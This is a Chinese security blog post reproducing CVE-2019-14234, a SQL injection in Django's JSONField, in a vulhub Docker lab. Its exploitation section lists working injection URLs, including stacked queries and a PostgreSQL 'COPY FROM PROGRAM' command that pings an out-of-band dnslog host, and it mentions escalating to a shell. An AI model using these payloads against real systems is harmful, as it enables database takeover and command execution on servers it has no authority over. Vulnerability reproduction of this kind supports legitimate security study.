专栏首页玄魂工作室CVE-2019-14234:Django JSONField SQL注入漏洞复现

CVE-2019-14234:Django JSONField SQL注入漏洞复现

本文作者:OneZero耀灵(Timeline Sec新成员)

本文共1112字,阅读大约需要3~4分钟

声明:请勿做非法用途,否则后果自负

0x00 简介


Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。

0x01 漏洞概述


该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。

Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。

通过JSONField类获得KeyTransform类并生成sql语句的位置。

其中key_name是可控的字符串,最终生成的语句是WHERE (field->'[key_name]') = 'value',因此可以进行SQL注入。

0x02 影响版本


Django

1.11.x before 1.11.23

2.1.x before 2.1.11

2.2.x before 2.2.4

0x03 环境搭建


在线环境:

转发本文至朋友圈并截图发至公众号内

自行搭建:

直接使用vulhub的docker环境搭建

git clone https://github.com/vulhub/vulhub.gitcd vulhub/django/CVE-2019-14234/docker-compose up -d

访问http://ip:8000可以正常访问说明搭建成功

0x04 漏洞利用


通过对代码的分析,可以知道如果在你的Django中使用了JSONField并且查询的“键名”可控,就可以进行SQL注入

访问http://ip:8000/admin

输入用户名admin ,密码a123123123

然后访问

http://ip:8000/admin/vuln/collection/

然后构造URL进行查询

http://ip:8000/admin/vuln/collection/?detail__a%27b=123

可以看到已经注入成功,并且可以看到构造的SQL语句

为进一步验证注入语句,我们继续构造

http://ip:8000/admin/vuln/collection/?detail__title')='1' or 1=1--

后台生成的sql语句的关键部分是

WHERE ("vuln_collection"."detail" -> 'title')='1' or 1=1-- ') = %s

由于or 1=1永为真,因此应该返回所有结果,页面返回结果符合预期,如下图

下一步结合CVE-2019-9193我们尝试进行命令注入,构造url如下

http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

页面结果虽然报错,但是报错原因是no results to fetch,说明我们的语句已经执行

然后用dnslog检测是否可以执行命令

http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping c2pn4v.dnslog.cn'--%20

成功检测到流量

复现环境里的postgresql数据库docker没对外的端口映射,如果开了或者真实环境里,还可以结合msf通过CVE-2019-9193来getshell

本文分享自微信公众号 - 玄魂工作室(xuanhun521)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-11-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 渗透测试入门指南与路线规划(全文版)

    我本非安全大牛,水平有限,所以自然亲民,和许多渗透测试的初学者打得火热。这其中大部分是大学生,还有工作多年,但一直对网络安全热情不减的热血之人。许多同学一直在努...

    用户1631416
  • Python黑客编程2 入门demo--zip暴力破解

    上一篇文章,我们在Kali Linux中搭建了基本的Python开发环境,本篇文章为了拉近Python和大家的距离,我们写一个暴力破解zip包密码的小程序。这个...

    用户1631416
  • WindowsVulnScan | 一款基于主机的漏洞扫描工具

    这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,...

    用户1631416
  • Springboot之HandlerMethodArgumentResolver源码解析

        前一篇博客讲解了如何用自定义HandlerMethodArgumentResolver进行参数解析,现在来看看springmvc是如何实现这个的。

    克虏伯
  • web九大组件之---RequestMappingHandlerAdapter详尽解析【享学Spring MVC】

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

    YourBatman
  • shiro整合swagger需要注意的点

    重新打开shiro,运行,swagger2页面访问正常,但是程序日志输出依然有权限访问出错

    开发架构二三事
  • Carbondata源码系列(一)文件生成过程

    在滴滴的两年一直在加班,人也变懒了,就很少再写博客了,最近在进行Carbondata和hive集成方面的工作,于是乎需要对Carbondata进行深入的研究。 ...

    岑玉海
  • 用NumGo实现安卓动画

    项目源码在github,欢迎star:https://github.com/toly1994328/NumGo

    张风捷特烈
  • 开源计划之--Android数字运动小插件--NumGo

    张风捷特烈
  • 解读Raft(四 成员变更)

    最近工作中讨论到了Raft协议相关的一些问题,正好之前读过多次Raft协议的那paper,所以趁着讨论做一次总结整理。

    林一

扫码关注云+社区

领取腾讯云代金券